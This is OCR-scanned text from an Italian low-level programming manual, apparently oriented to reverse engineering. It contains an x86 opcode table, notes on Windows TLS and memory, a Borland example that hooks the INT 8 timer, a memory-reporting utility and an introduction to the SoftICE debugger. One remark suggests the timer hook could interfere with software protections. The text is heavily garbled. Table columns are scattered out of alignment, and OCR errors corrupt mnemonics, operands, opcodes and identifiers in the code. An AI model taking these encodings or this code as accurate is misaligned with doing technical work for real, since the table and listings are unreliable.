r16,rm16,i8 


IN AL, DX 
IN AX,DX 
IN AL, i8 
IN AX,i8 


INC 
INC 
INC 
INSB 
INSW 


INT 3 (Breakpoint) 


INT 
INTO 
IRET 
JA r 
JAE 
JB r 
JBE 
JC r 
JICXZ 
JE r 


JG r 
JGE 
JLr 
JLE 
JNA 


r16 
rm8 
rm16 


i8 


el8 
rel8 
el8 
rel8 
el8 
rel8 
el8 


el8 
rel8 
el8 
rel8 
rel8 


ib 


iw 
/r 
/r 
/r 
/r 
/7 
/T7 
/T7 


ib 


ch 
ch 
ch 
ch 
ch 
ch 
ch 


ch 
ch 
ch 
ch 
ch 


ib 
ib 
iw 


ib 
ib 
iw 


ib 
ib 
iw 


ib 


JNAE rel8 
JINB rel8 
JINBE rel8 
JINC rel8 

JINE rel8 

JING rel8 
JINGE rel8 
JINL rel8 
JINLE rel8 
JNO rel8 

JINP rel8 

JINS rel8 

JINZ rel8 

JO rel8 

JP rel8 

JPE rel8 

JPO rel8 

JS rel8 

JZ rel8 

JMP rel16 
JMP ptr16:16 
JMP rel8 

JMP rm16 

JMP FAR m16:16 
LAHF 

LDS r16,m16:16 
LEA r16,rm16 
LEAVE 

LES r16,m16:16 
LOCK 

LODSB 

LODSW 

LOOP rel8 
LOOPE rel8 
LOOPNE rel8 
LOOPNZ rel8 
LOOPZ rel8 
MOV r8,i8 
MOV r16,1i16 
MOV AL,m8 
MOV AX,m16 


MOV m8,AL 
MOV m16,AX 
MOV r8,rm8 

MOV r16,rm16 
MOV rm8,r8 

MOV rm16,r16 
MOV rm8,i8 

MOV rm16,116 
MOV r16, segreg 
MOV segreg,r16 
MOVSB 

MOVSW 

MUL rm8 

MUL rm16 

NEG rm8 

NEG rm16 


NOT rm8 

NOT rm16 

OR AL, i8 

OR AX,i16 
OR r8,rm8 
OR r16,rm16 
OR rm8,r8 
OR rm16,r16 
OR rm8,i8 
OR rm16,18 
OR rm16,i16 
OUT DX, AL 
OUT DX, AX 
OUT i8,AL 
OUT i8,AX 
OUTSB 
OUTSW 

POP r16 

POP rm16 


ib 
iw 


ib 
iw 


ib 
ib 
iw 


iw 


POP DS 
POP ES 
POP SS 
POPA 

POPF 

PUSH r16 
PUSH rm16 
PUSH i8 
PUSH i16 
PUSH CS 


PUSH DS 
PUSH ES 
PUSH SS 
PUSHA 

PUSHF 

RCL rm8,1 
RCL rm16,1 
RCL rm8,CL 
RCL rm16,CL 
RCL rm8,i8 
RCL rm16,i8 
RCR rm8,1 
RCR rm16,1 
RCR rm8,CL 
RCR rm16, CL 
RCR rm8,i8 
RCR rm16, i8 
REP 

REPE 

REPNE 

RET i16 

RET 

RETF i16 
RETF 

ROL rm8,1 
ROL rm16,1 
ROL rm8,CL 
ROL rm16,CL 
ROL rm8,i8 
ROL rm16, i8 
ROR rm8,1 
ROR rm16,1 
ROR rm8,CL 
ROR rm16, CL 
ROR rm8,i8 
ROR rm16, i8 


SAL rm8,1 
SAL rm16,1 
SAL rm8,CL 
SAL rm16,CL 
SAL rm8,18 
SAL rm16, 18 
SAR rm8,1 

SAR rm16,1 
SAR rm8,CL 


SAR rm16,CL 
SAR rm8, 18 
SAR rm16, i8 
SBB AL, i8 

SBB AX, 116 
SBB r8,rm8 


code Data 


/r 
/r 
/r 
/r 
ib 
iw 


/r 


---* THE DISASSEMBLY TABLE -- IN HEX *--- 


Instruction 


ADD rm8,r8 
ADD rm16,r16 
ADD r8,rm8 
ADD r16,rm16 
ADD AL, i8 
ADD AX, 116 
PUSH ES 

POP ES 

OR rm8,r8 


ib 
ib 


ib 
ib 


ib 
ib 


ib 
ib 


ib 
ib 


ib 
ib 


SBB 
SBB 
SBB 
SBB 
SBB 
SBB 


r16,rm16 
rm8,r8 
rm16,r16 
rm8, i8 
rm16,i8 
rm16, 116 


SCASB 
SCASW 
SEGCS 
SEGDS 
SEGES 
SEGSS 
SETALC 


SHL 
SHL 
SHL 
SHL 
SHL 
SHL 
SHR 
SHR 
SHR 
SHR 
SHR 
SHR 
STC 
STD 
STI 
STOS 
STOS 
SUB 
SUB 
SUB 
SUB 
SUB 
SUB 
SUB 
SUB 
SUB 
TEST 


TEST 
TEST 
TEST 
TEST 
TEST 
WAIT 
XCHG 
XCHG 
XCHG 
XCHG 
XCHG 
XLAT 
XOR 
XOR 
XOR 
XOR 
XOR 
XOR 
XOR 
XOR 
XOR 


Opcode 


rm8,1 
rm16,1 
rm8, CL 
rm16, CL 
rm8, i8 
rm16,i8 
rm8,1 

rm16,1 
rm8, CL 
rm16, CL 
rm8,i8 
rm16,i8 


B 

W 

AL, i8 
AX, 116 
r8,rm8 
r16,rm16 
rm8,r8 
rm16,r16 
rm8, i8 
rm16,i8 
rm16, 116 
AL, i8 


AL, 116 
rm8,r8 
rm16,r16 
rm8, i8 
rm16, 116 


AX,r16 
r8,rm8 
rm8,r8 
r16,rm16 
rm16,r16 

B 

AL, i8 

AX, 116 

r8,rm8 

r16,rm16 
rm8,r8 
rm16,r16 
rm8, i8 
rm16,i8 
rm16, 116 


Data 


/r 
/r 
/r 
ib 
iw 


(22) 


/r 


80 /3 ib 
83 /3 ib 
81 /3 iw 


co /4 ib 
C1 /4 ib 


CO /5 ib 
C1 /5 ib 


80 /5 ib 
83 /5 ib 
81 /5 iw 


F6 /0 ib 
F7 /0 iw 


Instruction 


OR rm16,r16 
OR r8,rm8 
OR r16,rm16 
OR AL, i8 
OR AX,i16 
PUSH CS 
(386 - indicates extended 


ADC rm8,r8 


/r 
/r 
/r 
ib 
iw 


/r 
/r 
/r 
/r 
ib 
iw 


/r 
/r 
/r 
/r 
ib 
iw 
[Prefix] 
/r 
/r 
/r 
/r 


ib 
iw 
[Prefix] 
/r 
/r 
/r 
/r 
ib 
iw 
[Prefix] 
/r 
/r 
/r 
/r 
ib 
iw 
[Prefix] 


ADC 
ADC 
ADC 
ADC 
ADC 


rm16, r16 
r8,rm8 
r16, rm16 
AL, i8 
AX, 116 


PUSH SS 


POP 
SBB 
SBB 
SBB 
SBB 
SBB 
SBB 


SS 
rm8,r8 
rm16, r16 
r8,rm8 
r16, rm16 
AL, i8 
AX, 116 


PUSH DS 


POP 
AND 
AND 
AND 


DEC 


DS 
rm8,r8 
rm16,r16 
r8,rm8 
r16,rm16 
AL, i8 
AX, 116 
override 


rm8,r8 
rm16, r16 
r8,rm8 
r16,rm16 


AL, i8 
AX, 116 
override 


rm8,r8 
rm16,r16 
r8,rm8 
r16,rm16 
AL, i8 
AX, 116 
override 


rm8,r8 
rm16,r16 
r8,rm8 
r16,rm16 
AL, i8 
AX, 116 
override 


r16 
r16 


PUSH r16 


POP 


r16 


PUSHA 
POPA 
BOUND r16,m16&16 


(286 
(386 


instruction: ARPL) 
prefix bytes) 


iw 
iw 
ib 
ib 


PUSH i16 


IMUL r16,rm16,116 


IMUL r16,116 
PUSH i8 


IMUL r16,rm16,i8 


IMUL r16,i8 
INSB 
INSW 
OUTSB 
OUTSW 

JO rel8 
JINO rel8 
JB rel8 
JAE rel8 
JIZ rel8 
JINZ rel8 
JBE rel8 


JA rel8 
JS rel8 
JINS rel8 


ib 
ib 
ib 
ib 
ib 
ib 
ib 
ib 
iw 
iw 
iw 
iW 
iw 
iW 
iw 
iw 
ib 
ib 
ib 
ib 
ib 
ib 
ib 
ib 
ib 
ib 
ib 
ib 
ib 
ib 
ib 
ib 


JPE rel8 

JPO rel8 

JL rel8 

JGE rel8 

JLE rel8 

JG rel8 

ADD rm8,i8 
OR rm8,i8 
ADC rm8,i8 
SBB rm8,1i8 
AND rm8,1i8 
SUB rm8,1i8 
XOR rm8,i8 
CMP rm8,1i8 
ADD rm16,i16 
OR rm16,i16 
ADC rm16, 116 
SBB rm16,116 
AND rm16, 116 
SUB rm16,116 
XOR rm16,i16 
CMP rm16,1i16 
ADD rm8,i8 
OR rm8,i8 
ADC rm8,i8 
SBB rm8,1i8 
AND rm8,i8 
SUB rm8,1i8 
XOR rm8,i8 
CMP rm8,1i8 
ADD rm16,1i8 
OR rm16, 18 
ADC rm16,1i8 
SBB rm16, 18 
AND rm16,i8 
SUB rm16, i8 
XOR rm16,i8 
CMP rm16, i8 
TEST rm8,r8 
TEST rm16,r16 
XCHG rm8,r8 
XCHG r8,rm8 
XCHG rm16,r16 


XCHG r16,rm16 
MOV rm8,r8 
MOV rm16,r16 
MOV r8,rm8 
MOV r16,rm16 


MOV rm16, segreg 


LEA r16,rm16 


MOV segreg, rm16 


POP rm16 


(Not an instruction) 


NOP 
XCHG AX,r16 
CBW 
CWD 


CALL FAR ptr16:16 


WAIT 
PUSHF 

POPF 

SAHF 

LAHF 

MOV AL,m8 
MOV AX,m16 
MOV m8,AL 
MOV m16, AX 
MOVSB 

MOVSW 
CMPSB 
CMPSW 

TEST AL, i8 
TEST AL, i16 
STOSB 
STOSW 

LODSB 

LODSW 


AE -- 

AF -- 
BO+rb ib 
B8+rw iw 

co /0 /r ib 
CO /1 /r ib 
co /2 /r ib 
co /3 /r ib 
co /4 /r ib 
CO /5 /r ib 
co /6 /r ib 
co /7 /r ib 
C1 /0 /r ib 
C1 /1 /r ib 
C1 /2 /r ib 
c1 /3 /r ib 
C1 /4 /r ib 
C1 /5 /r ib 
C1 /6 /r ib 
C1 /7 /r ib 
c2 iw 

c3 -- 

c4 /r 

C5 /r 

ce /0 /r ib 
C6 /1-7 (22) 
c7 /0 /r iw 
C7 /1-7 (?2) 
c8 iw ib 
c9 -- 

CA iw 

CB -- 

cc -- 

CD ib 

CE -- 

CF -- 

DO /0 /r 

DO /1 /r 

DO /2 /r 

DO /3 /r 

DO /4 /r 

DO /5 /r 

DO /6 /r 

DO /7 /r 

D1 /0 /r 

D1 /1 /r 

D1 /2 /r 

D1 /3 /r 

D1 /4 /r 

D1 /5 /r 

D1 /6 /r 

D1 /7 /r 

D2 /0 /r 

D2 /1 /r 

D2 /2 /r 

D2 /3 /r 

D2 /4 /r 

D2 /5 /r 

D2 /6 /r 

D2 /7 /r 

D3 /0 /r 

D3 /1 /r 

D3 /2 /r 

D3 /3 /r 

D3 /4 /r 

D3 /5 /r 

D3 /6 /r 

D3 /7 /r 

D4 0A 

D4 ib 

D5 0A 

D5 ib 

D6 -- 

D7 -- 
D8-DF (22) 
EO ch 


SCAS 


SCASW 


MOV 
MOV 
ROL 
ROR 
RCL 
RCR 
SHL 
SHR 
SHL 
SAR 


ROL 
ROR 
RCL 
RCR 
SHL 
SHR 
SHL 
SAR 
RET 
RET 
LDS 
LES 
MOV 
(Not a 
MOV 
(Not a 
ENTE 
LEAV 
RETF 
RETF 
INT 
INT 
INTO 
IRET 
ROL 
ROR 
RCL 
RCR 


AAD 
SETA 
XLAT 
(FPU 
LOOP 


r8,18 

r16, 116 
rm8, i8 
rm8,i8 
rm8, i8 
rm8, i8 
rm8, i8 
rm8, i8 
rm8, i8 
rm8,i8 


rm16,i8 
rm16,1i8 
rm16,i8 
rm16,i8 
rm16,1i8 
rm16,i8 
rm16,i8 
rm16,i8 
116 


r16,m16:16 
r16,m16:16 
rm8, i8 
n instruction) 
rm16, 116 

n instruction) 
R i16,18 

E 

116 


3 (Breakpoint) 
i8 


rm8,1 
rm8,1 
rm8,1 
rm8,1 
rm8,1 
rm8,1 
rm8,1 
rm8,1 
rm16,1 
rm16,1 
rm16,1 
rm16,1 
rm16,1 
rm16,1 
rm16,1 
rm16,1 
rm8, CL 
rm8, CL 
rm8, CL 
rm8, CL 
rm8, CL 
rm8, CL 
rm8, CL 
rm8, CL 


rm16, CL 
rm16, CL 
rm16, CL 
rm16, CL 
rm16, CL 
rm16, CL 
rm16, CL 
rm16, CL 


18 (undocumented) 


18 (undocumented) 
LC (undocumented) 
B 

instructions) 

NZ rel8 


E2 ch 
E3 ch 
E4 ib 
E5 ib 
E6 ib 
E7 ib 
E8 (ell) 
E9 Cw 
EA cd 
EB ch 
EC "- 
ED "- 
EE "> 
EF "> 
FO [Prefix] 
F1 22 
F2 [Prefix] 
F3 [Prefix] 
F4 -- 
F5 "- 
F6 /0 ib 
F6 /1 ib 
(undocumented) 
F6 /2 /r 
F6 /3 /r 
F6 /4 /r 
F6 /5 /r 
F6 /6 /r 
F6 /7 /r 
F7 /0 iw 
F7 /1 iw 
(undocumented) 
F7 /2 /r 
F7 /3 /r 
F7 /4 /r 
F7 /5 /r 
F7 /6 /r 
F7 /7 /r 
F8 "> 
F9 "- 
FA "- 
FB "- 
FC -- 
FD "- 
FE /0 /r 
FE /1 /r 
FE /2-7 (2?) 
FF /0 /r 
FF /1 /r 
FF /2 /r 
FF /3 /r 
FF /4 /r 
FF /5 /r 
FF /6 /r 
FF /7 (2?) 


LOOPZ rel8 
LOOP rel8 
JICXZ rel8 
IN AL, i8 
IN AX,i8 
OUT i8,AL 
OUT i8,AX 
CALL rel16 
JMP rel16 
JMP ptr16:16 
JMP rel8 
IN AL, DX 
IN AX,DX 
OUT DX, AL 
OUT DX, AX 
LOCK 


(apparently unused) 


REPE 

REPNE 

HLT 

CMC 

TEST rm8,i8 
TEST rm8,i8 


NOT rm8 
NEG rm8 
MUL rm8 
IMUL rm8 
DIV rm8 
IDIV rm8 
TEST rm16,i16 


TEST rm16,i16 


NOT rm16 
NEG rm16 
MUL rm16 
IMUL rm16 
DIV rm16 
IDIV rm16 
CLC 

STC 

CLI 

STI 

CLD 

STD 

INC rm8 
DEC rm8 


(Not an instruction) 


INC rm16 
DEC rm16 
CALL rm16 
CALL FAR m16:16 
JMP rm16 
JMP FAR m16:16 
PUSH rm16 


(Not an instruction) 
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INFORMAZIONI VARIE 


Alcune note possono essere portate in relazione all’indirizzamento di memoria in 
funzione del sistema operativo usato. 

Parlando prima di indirizzamento dicevamo che nel caso dei 16 bits i segmenti 
erano di 64 Kbytes mentre nel 32 bits si poteva indirizzare sino a 4 Gbytes di 
memoria. 

In pratica 2 Gbytes dovrebbero essere indirizzate dal programma mentre 2 da 
sistema operativo. 

Per vedere se un indirizzo di memoria è accessibile è possibile utilizzare una 
funzione C con un puntatore settato all'indirizzo da testare. 


BOOL IsFirst64kInvalid(void) 


BOOL bFirst64kInvalid = FALSE; 


try { 
*(char *)0x0000FFFF; 


} 
except (EXCEPTION_EXECUTE_HANDLER) { 
if (EXCEPTION_ACCESS_VIOLATION == GetExceptionCode()) 
bFirst64kInvalid = TRUE; 


} 


return bFirst64kInvalid; 


Sempre in relazione alla memoria al fine di nascondere alcune informazioni 
spesso vengono usate zone particolari. 

Seguendo con il debugger alcuni programmi spesso si notato chiamate ad una serie 
di funzioni che iniziano per Tls. 

Che cosa sarebbe questo Tls ? 

Tls stà per Thread Local Storage ovvero una zona di memoria locale ai threads di 
un processo, nel quale questi possono salvae informazioni private. 

Esistono quattro funzioni che permettono la gestione di questa memoria. 


TlsAlloc() 
TlsGetValue() 
TlsSetValue() 
TlsFree() 


La prima funzione alloca la memoria e restituisce un indice che può essere 
utilizzato per accederci. 

Questo indice deve essere salvato in una variabile globale o statica. 

Ad esempio 

TlsIndex = TIlsAlloc(); 


alloca la memoria e restitusce l’indice salvato in TlsIndex. 
Il seguente esempio invece aloca dinamicamente 100 bytes e li salva nella TLS. 


TlsSetValue(TlsIndex, malloc(100)); 

La funzione 

TlsSetValue(TlsIndex, (LPVOID)hwWnd); 

salva nel TLS l’handle ad una window generica. 

Ogni thread di un processo possiede il suo TLS privato anche se di fatto il 


tutto viene gestito da un solo indice. 
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TlsAlloc() può essere chiamato una sola volta per processo e riserva per ogni 
thread la sua DWORD-size di memoria privata. 

Se la funzione vista come esempio precedentemente, relativa al salvataggio 
dell’handle della window, viene chiamata dal thread A, questa accedera ad una 
zona di memoria differente da quella a cui si sarebbe giunti se la chiamata 
fosse stata fatta dal thread B. 

Prima che l’ultimo thread termini si deve liberare la memoria dinamicamente 
allocata con 


free(TlsGetValu(TlsIndex))); 
e successivamente liberare la memoria TLS 


if(!TlsFree(TlsIndex)) 
// handle errpor on TlsFree 


INTERRUPT DI TIMER INT 8 


Un interrupt particolare cha ai tempi in cui avevo scritto il volume sui TSR era 
il fiore all'occhiello per i sistemi multitasking eral’interrupt di timer ovvero 
l’int 8. 

Questo veniva chiamato un certo numero di volte al secondo (18.2) e poteva 
essere sfruttato per la creazione di routine concorrenti. 

La scrittura pretendeva sistemi particolari per fare in modo che i processi 
software agganciati a questo interrupt non fossero troppo invadenti o grosse. 
Sotto Windows il concetto parallelo potrebbe essere quello del messaggio di 
WM_TIMER. 

In pratica è possibile scrivere una certa funzione ed agganciarla a questo 
interrupt. 

I processi che sono eseguiti verrebbero sospesi 18.2 volte al secondo per 
lanciare il software settato. 

I segeunti moduli permettono l’aggancio a questo interrupt in ambiente a 32 
bits. 

Ricordiamoci che questo inettrupt potrebbe essere alla base di sistemi 
concorrenti indirizzati alla protezione del software. 

Se alcuni breakpoint sono basati su registri hardware sarebbe possibile creare 
routine concorrenti che vadano a rompere le uova nel paniere a certi software. 
Il sistema per l'aggancio all’int 8 è composto da un modulo assembler e da uno 
C. 


Isr32.c 


#include <stdio.h> 
#include <conio.h> 


#ifndef __DPMI32__ 

#error Must be compiled for 32-bit DPMI. Use BCC32 -WX 
#endif 

#pragma inline 

#define INTERRUPT 0x08 

typedef unsigned char uchar; 

typedef unsigned short ushort; 

typedef unsigned long ulong; 


struct fword { 
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ulong offset; 
ushort selector; 


}; 
ulong ticks=0; 


fword oldhandler; 
unsigned short dataseg; 


extern "C" void handler( void ); 


void setvect( uchar vector, ushort sel, ulong ofs ) { 
asm { 
push ds 
push edx 
push ax 
mov edx,ofs 
mov ax,sel 
mov ds,ax 
mov ah,0x25 
mov al,vector 


int 00x21 
pop ax 
pop edx 
pop ds 


} 
} 


void getvect( uchar vector, ushort *sel, ulong *ofs ) { 

ushort tempsel; 
ulong tempofs; 
asm { 

push es 

mov ah, 0x35 

mov al,vector 

int 0x21 

MOV ax,es 

pop es 

mov tempsel, ax 

mov tempofs, ebx 


} 
*sel = tempsel; 
*ofs = tempofs; 


} 


int main(void) { 
// vshort sel; 
// \uvlong ofs; 


dataseg= DS; 


getvect( INTERRUPT, &oldhandler.selector, &oldhandler.offset ); 

printf("interrupt %02X was at %04X:%081X\n",INTERRUPT, 
oldhandler.selector, 
oldhandler.offset ); 

setvect( INTERRUPT, _CS, (unsigned long)handler ); 

printf("new handler installed, press any key to quit\n"); 


while (!kbhit()) { 
printf("%cTimer ticks: %lu",13,ticks); 


printf("\n"); 
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printf("removing handler\n"); 
setvect( INTERRUPT, oldhandler.selector, oldhandler. offset ); 


return 0; 


i; 


7 TIMER32.ASM Assembly helper file for ISR32.CPP 


; Copyright (c) 1994 by Borland International 
; All Rights Reserved. 

-386 

.model flat,c 


.data 


extrn ticks:dword 
extrn dataseg:word 
extrn oldhandler :fword 


. code 


handler proc far 
public handler 


push ds 

push eax 

mov ds,cs:[dataseg] 
mov eax,[ticks] 

inc eax 

mov [ticks],eax 
pop eax 

pop ds 


jmp cs:fword ptr [oldhandler] 
handler endp 


end 


timer32.mak 


HH HEHE HEHE HEHE HH HEHE HEHE HE HH HEHE RE RE HH HHEREEREHHHHEREREREHHHHEHEREHEHEHEEHEHHHHEEHEREHHHHRHH 
# DPMI examples - (C) Copyright 1994 by Borland International 
# All rights reserved 


Fin 
# TIMER32.MAK - Example of hooking the hardware timer (int-8) in a DPMI32 

# program. 

# 

# 

timer32.exe : -etimer32.exe isr32.cpp timer32.asm 


bcc32 -WX $** 


RICAVARE LE INFORMAZIONI RELATIVE A TUTTA LA MEMORIA 
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Partendo dalla memoria fisica installata possiamo ricavare tutte le informazioni 
relative alla memoria HEAP, alla memoria virtuale, alla emassima dimensione di 
memoria HEAP allocabile e così via. 

Il seguente programma mostra tutte le informazioni relative alla memoria. 

Parte del programma è in C mentre certe funzioni sono scritte direttamente in 
assembler tramite le istruzioni inline dei compilatori C. 


Freemem2.c 


#include <windows.h> 
#include <toolhelp.h> 
#include "freemem2.h" 


// Reads the CMOS RAM to get the total installed memory 
DWORD GetInstalledRAM(void) 


{ 

_ asm { 
cli // Disable interrupts 
// Read the base memory (in K) into BX 
MOV al, 15h // Tell the CMOS ram which byte we want to read 
out 70h, al 
in al, 71h // read in the byte from the CMOS ram 
mov bl, al 
mov al, 16h 
out 70h, al 
in al, 71h 
mov bh, al 
// Read the extended memory (in K) into AX 
mov al, 18h 
out 70h, al 
in al, 71h 
mov ah, al 
mov al, 17h 
out 70h, al 
in al, 71h 
sti // enable interrupts 
xor dx, dx // add base + extended memory and put the 
add ax, bx // result into DX:AX 
adc dx, 0 

} 

// Ignore the compiler complaint about "function must return a value" 

} 


// Sum up the sizes of all the global heap blocks. If a non-zero pointer 

// is passed as a parameter, store the size of the largest free block 

// into that location. 

DWORD GetGlobalHeapSize(DWORD *pLargestFree) 

{ 
GLOBALENTRY ge; 
DWORD size = 0; 
BOOL fContinue; 


if ( pLargestFree ) 
*pLargestFree = 0; // Initial largest free block is 0 bytes 
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// Use TOOLHELP GlobalFirst/GlobalNext to walk the global heap 
ge.dwSize = sizeof(ge); 

fContinue = GlobalFirst(&ge, GLOBAL_ALL); 

while ( fContinue ) 


{ 


size += ge.dwBlockSize; // Add blocksize to running total 


// If the block is free, and larger than the previous largest 
// free block, make it the new largest free block 
if ( pLargestFree && (ge.wType == GT_FREE) ) 
if ( ge.dwBlockSize > *pLargestFree ) 
*pLargestFree = ge.dwBlockSize; 


fContinue = GlobalNext(&ge, GLOBAL_ALL); 
} 


*pLargestFree /= 1024; // Convert bytes to K 
return size / 1024; 


} 


// Fill in the dialog text controls that never vary (installed RAM, etc...) 
void PaintConstantItems(HWND hwndDlg) 


{ 
MEMMANINFO mmi; 
DWORD size; 
char buffer[128]; 
mmi.dwSize = sizeof(mmi); 
MemManInfo(&mmi); 
wsprintf(buffer, "Installed RAM: %ldk", GetInstalledRAM()); 
SetDlgItemText(hWndDlg, IDT_INSTALLED_RAM, buffer ); 
// check to see if the field is -1. If we didn't, we'd show -4K! 
size = (mmi.dwTotalPages == -1) ? -1 : mmi.dwTotalPages * 4; 
wsprintf(buffer, "Total Memory: %ldk", size); 
SetDlgItemText(hWwndDlg, IDT_TOTAL_MEMORY, buffer ); 
wsprintf(buffer, "Swap File Pages: %ldk", mmi.dwSwapFilePages * 4); 
SetDlgItemText(hWndDlg, IDT_SWAP_FILE_PAGES, buffer ); 
size = (mmi.dwTotalLinearSpace == -1) ? -1 : mmi.dwTotalLinearSpace * 4; 
wsprintf(buffer, "Linear Space: %ldk", size); 
SetDlgItemText(hWndDlg, IDT_ADDRESS_SPACE, buffer ); 

} 


// Fill in the dialog text controls that vary (largest free block, etc...) 
void PaintVariableItems(HWND hwndDlg) 
{ 

MEMMANINFO mmi; 

DWORD largestFreeGlobalHeapBlock; 

DWORD totalGlobalHeapSize; 

char buffer[128]; 

DWORD size; 


totalGlobalHeapSize = GetGlobalHeapSize(&largestFreeGlobalHeapBlock); 
mmi.dwSize = sizeof(mmi); 
MemManInfo(&mmi); 


wsprintf( buffer, "Global Heap Total: %ldk", totalG6lobalHeapSize); 
SetDlgItemText(hWndDlg, IDT_GLOBAL_HEAP_TOTAL, buffer); 
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wsprintf( buffer, "Largest Free Heap Block: %1ldk", 
largestFreeGlobalHeapBlock); 
SetDlgItemText(hWndDlg, IDT_LARGEST_FREE_GLOBAL, buffer); 


size = (mmi.dwMaxPagesLockable == -1) ? -1 : mmi.dwMaxPagesLockable * 4; 
wsprintf( buffer, "Max Lockable Pages: %ldk", size); 
SetDlgItemText(hWndDlg, IDT_MAX_LOCKABLE, buffer); 


size = (mmi.dwFreePages == -1) ? -1 : mmi.dwFreePages * 4; 
wsprintf( buffer, "Free Memory: %ldk", size); 
SetDlgItemText(hWndDlg, IDT_TOTAL_FREE, buffer); 


wsprintf( buffer, "Largest Free Block: %ldk", mmi.dwLargestFreeBlock/1024); 
SetDlgItemText(hWndDlg, IDT_LARGEST_FREE, buffer); 


size = (mmi.dwFreeLinearSpace == -1) ? -1 : mmi.dwFreeLinearSpace * 4; 
wsprintf( buffer, "Free Linear Space: %ldk", size); 
SetDlgItemText(hWndDlg, IDT_FREE_SPACE, buffer); 


} 


BOOL CALLBACK _export FreeMem2DlgProc(HWND hWwndDlg, UINT msg, 
WPARAM wParam, LPARAM lParam) 


if ( msg == WM_INITDIALOG ) 
PaintConstantItems(hWndD1lg); 
PaintVariableItems(hWndD1lg); 
SetTimer( hWndDlg, 1, 5000, 0 ); // a 5 second timer 
else if ( msg == WM_COMMAND ) 


if ( wParam == IDB_EXIT ) // Exit button pushed? 
EndDialog(hwndDlg, 0); 


else if ( msg == WM_TIMER ) // 5 seconds are up! 
PaintVariableItems(hWndDlg); 

else if ( msg == WM_ CLOSE ) 
EndDialog(hwndDlg, 0); // User hit Close on the system menu 


return FALSE; 
int PASCAL WinMain( HANDLE hInstance, HANDLE hPrevInstance, 
LPSTR lpszCmdLine, int nCmdShow ) 


DialogBox(hInstance, "FreeMem2Dlg", 0, FreeMem2DlgProc); 
return 0; 


Il seguente è il file .DEF 


Freemem2 . def 


NAME ' FREEMEM2' 

DESCRIPTION 'System Memory Utility - Matt Pietrek 1993' 
EXETYPE WINDOWS 

CODE PRELOAD MOVEABLE DISCARDABLE 

DATA PRELOAD MOVEABLE MULTIPLE 

STACKSIZE 5120 

HEAPSIZE 5120 
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Freemem2 .h 


#define IDB_EXIT 100 
#define IDT_INSTALLED_RAM 101 
#define IDT_GLOBAL_HEAP_TOTAL 102 
#define IDT_LARGEST_FREE_GLOBAL 103 


#define IDT_TOTAL_MEMORY 104 
#define IDT_SWAP_FILE_ PAGES 105 
#define IDT_MAX_LOCKABLE 106 
#define IDT_TOTAL_FREE 107 
#define IDT_ADDRESS_SPACE 108 
#define IDT_FREE_SPACE 109 
#define IDT_LARGEST_FREE 110 
Il file .mak 


Freemem2 . mak 
PROJNAME = FREEMEM2 


$(PROJNAME).exe: $(PROJNAME).0bj $(PROJNAME).res 
link /ON:N /A:16 $(PROJNAME).0bj, $(PROJNAME), , \ 
LIBW.LIB TOOLHELP.LIB SLIBCEW.LIB,$(PROJNAME) . def 
RC $(PROJNAME).res $(PROJNAME).exe 


$(PROJNAME).0bj: $(PROJNAME).c $(PROJNAME) .h 
CL /W3 /GAs /62 /c /Zi $(PROJNAME).c 


$(PROJNAME).res: $(PROJNAME).rc 
RC -R -FO $(PROJNAME).res $(PROJNAME).rc 


Il file delle risorse. 
Freemem2.rc 


#include <windows.h> 
#include "freemem2.h" 


FreeMem2Dlg DIALOG 19, 61, 305, 76 
STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU 
CAPTION "FreeMem2 - Matt Pietrek 1993" 
BEGIN 

LTEXT "Installed RAM:", IDT_INSTALLED_RAM, 4, 4, 90, 8, WS CHILD | 
WS_VISIBLE | WS_GROUP 

LTEXT "Global Heap Total:", IDT_GLOBAL_HEAP_TOTAL, 4, 16, 100, 8, WS_CHILD | 
WS_VISIBLE | WS_GROUP 

LTEXT "Largest Free Heap Block:", IDT_LARGEST_FREE_GLOBAL, 112, 16, 140, 8, 
WS_CHILD | WS_VISIBLE | WS_GROUP 

LTEXT "Total Memory:", IDT_TOTAL_MEMORY, 4, 36, 104, 8, WS CHILD | 
WS_VISIBLE | WS_GROUP 

LTEXT "Max Lockable Pages:", IDT_MAX_LOCKABLE, 4, 48, 104, 8, WS_CHILD | 
WS_VISIBLE | WS_GROUP 

LTEXT "Free Memory:", IDT_TOTAL_FREE, 112, 48, 90, 8, WS _CHILD | WS_VISIBLE 
| WS_GROUP 

LTEXT "Linear Space:", IDT_ADDRESS_SPACE, 4, 60, 104, 8, WS_CHILD | 
WS_VISIBLE | WS_GROUP 

LTEXT "Swap File Pages:", IDT_SWAP_FILE_ PAGES, 112, 36, 90, 8, WS_CHILD | 
WS_VISIBLE | WS_GROUP 
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LTEXT "Largest Free Block:", IDT_LARGEST_FREE, 206, 60, 96, 8, WS_CHILD | 
WS_VISIBLE | WS_GROUP 

LTEXT "Free Linear Space:", IDT_FREE_SPACE, 112, 60, 90, 8, WS_CHILD | 
WS_VISIBLE | WS_GROUP 

CONTROL "DPMI / MemManInfo", 101, "button", BS_GROUPBOX | WS_CHILD | 
WS_VISIBLE, 2, 26, 302, 46 

DEFPUSHBUTTON "Exit", IDB_EXIT, 260, 4, 32, 14, WS_CHILD | WS_VISIBLE | 
WS_TABSTOP 
END 
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SOFTICE 


SoftIce deve essere trattato a parte a causa delle grosse potenzialità ma anche 
delle difficoltà maggiori rispetto gli altri debugger. 

SI è stato disponibile per diversi sistemi operativi quali ad esempio DOS, WIN16 
e WIN32. 

Purtroppo sotto Windows 2000 le versioni esistenti si rifiutano di installarsi 
ma d’altra parte è anche giusto perché già a prima vista questa versione di 0S 
sembra disporre di differenze che giustificano pienamente questo fatto. 
Sicuramente i software che sviluppavano le loro funzionalità tramite chiamata 
alle API funzioneranno ancora. 

In altre parole se, ad esempio, eseguivano un interrogazione al file di registro 
mediante le calls API (RegQueryvalue ecc.) continueranno a funzionare 
tranquillamente. 

A livello sistemistico (gestione dei task, dei processi) ci saranno sicuramente 
differenze per cui i software che agiscono a basso livello, come potrebbe 
esserlo un Debugger, avranno qualche problema. 

SI è composto da alcuni moduli il cui scopo, a parte il nucleo principale, è 
quasi sempre legato al debugging di programmi con sorgenti a disposizione. 

Il cuore di SI viene caricato, in genere da AUTOEXEC, ed è sempre disponibile ed 
attivabile con la semplice pressione di alcuni tasti come ad esempio CTRL-D che 
è la combinazione di default. 

Questa può essere modificata a piacere. 

Un modulo particolare è quello di setup che in genere viene attivato all’inizio 
per settare MOUSE e SCHEDA VIDEO. 

Rispetto agli altri programmi descritti in questo manuale SI non dispone di 
immagini catturate in quanto dopo la sua comparsa disabilita i tasti che sono 
